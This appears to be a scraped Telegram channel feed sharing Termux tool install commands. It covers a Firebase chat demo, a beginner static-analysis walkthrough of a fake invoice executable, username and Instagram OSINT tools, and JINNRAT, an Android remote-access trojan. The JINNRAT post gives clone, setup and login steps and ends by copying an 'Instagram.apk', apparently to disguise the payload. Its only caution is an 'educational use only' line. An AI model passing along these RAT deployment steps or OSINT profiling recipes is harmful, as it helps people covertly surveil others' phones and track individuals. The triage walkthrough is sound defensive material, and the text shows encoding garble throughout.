Please open Telegram to view this post
VIEW IN TELEGRAM
β€15π₯°4π1π1
This media is not supported in your browser
VIEW IN TELEGRAM
Hashing with practical examples
ENJOY π
ENJOY π
β€12π1
Firebase Realtime Chat (Simple WhatsApp Logic)
πΉ Bio
Lightweight chat app demonstrating:
Realtime database
User presence
Message sync
Perfect for beginners.pkg install git nodejs
git clone https://github.com/firebase/friendlychat
cd friendlychat
npm install
β οΈFor more information and use of this tool in termux visit github link of this tool.
π¨βπ» @TERMUXCOMMANDD
β€13
Step 1: Donβt trust the file name
File names lie all the time. A file like invoice_update.exe is already suspicious.
An invoice should never be a Windows executable.
Step 2: Check size & basic details
Always check the file size. Around 400 KB may be normal for a small program,
but it is completely abnormal for an invoice or document.
Step 3: Look inside without running it
You can learn a lot without executing the file.
Readable strings often expose program behavior such as system and internet usage
(kernel32.dll, LoadLibraryA, InternetOpenA, etc.).
Step 4: Look for URLs or web paths
Malware almost always communicates over the internet.
Finding URLs, API paths, or user-agents is a major red flag.
An invoice does not need internet access.
Step 5: Check if the file is hiding
Malware often packs or obfuscates its code to avoid detection.
High entropy or suspicious section names usually indicate this behavior.
Step 6: Put it all together
This file pretends to be an invoice, but it is actually a Windows program.
It contains internet communication code and hides its internal logic.
You donβt need advanced reversing skills to reach this conclusion.
This is beginner-level analysis done correctly.
file invoice_update.exe
ls -lh invoice_update.exe
strings invoice_update.exe | head
strings invoice_update.exe | grep -i http
pecheck invoice_update.exe
Please open Telegram to view this post
VIEW IN TELEGRAM
β€9π―3π1
JINNRAT - Remote Android Managment Suite
β οΈ Educational use only. Unauthorized or illegal use is strictly prohibited.
git clone https://github.com/alvinbaby/JINNRAT
cd JINNRAT
bash setup.sh
bash setup.sh
http://localhost:22533
username : admin
password : root
ls
cd JINNRAT
ls
bash setup.sh
Then click 3 after installation done after click 1 copy link I'd password
Then in In ip paste : 127.0.0.1
Port: 22222
then ctrl C after
ls
cd app
ls
cp Instagram.apk
Done
β οΈ Educational use only. Unauthorized or illegal use is strictly prohibited.
β οΈFor more information and use of this tool in termux visit github link of this tool.
π¨βπ» @TERMUXCOMMANDD
β€26
Search for a username across hundreds of social networks.
git clone https://github.com/p1ngul1n0/blackbird
git clone https://github.com/p1ngul1n0/blackbird
β€7π3
Wishing you a year that changes everything for the better.
Please open Telegram to view this post
VIEW IN TELEGRAM
β€7π2
Toutatis is a little-known Instagram OSINT tool used to collect public profile data, metadata, posts, captions, hashtags, and digital footprint.
No hacking, public data only β good for OSINT & research learning.
No hacking, public data only β good for OSINT & research learning.
pkg update -y && pkg install git python -y && pip install --upgrade pip && git clone https://github.com/megadose/toutatis.git && cd toutatis && pip install -r requirements.txt
python3 toutatis.py
β οΈFor more information and use of this tool in termux visit github link of this tool.
π¨βπ» @TERMUXCOMMANDD
β€16π3π―3π1π1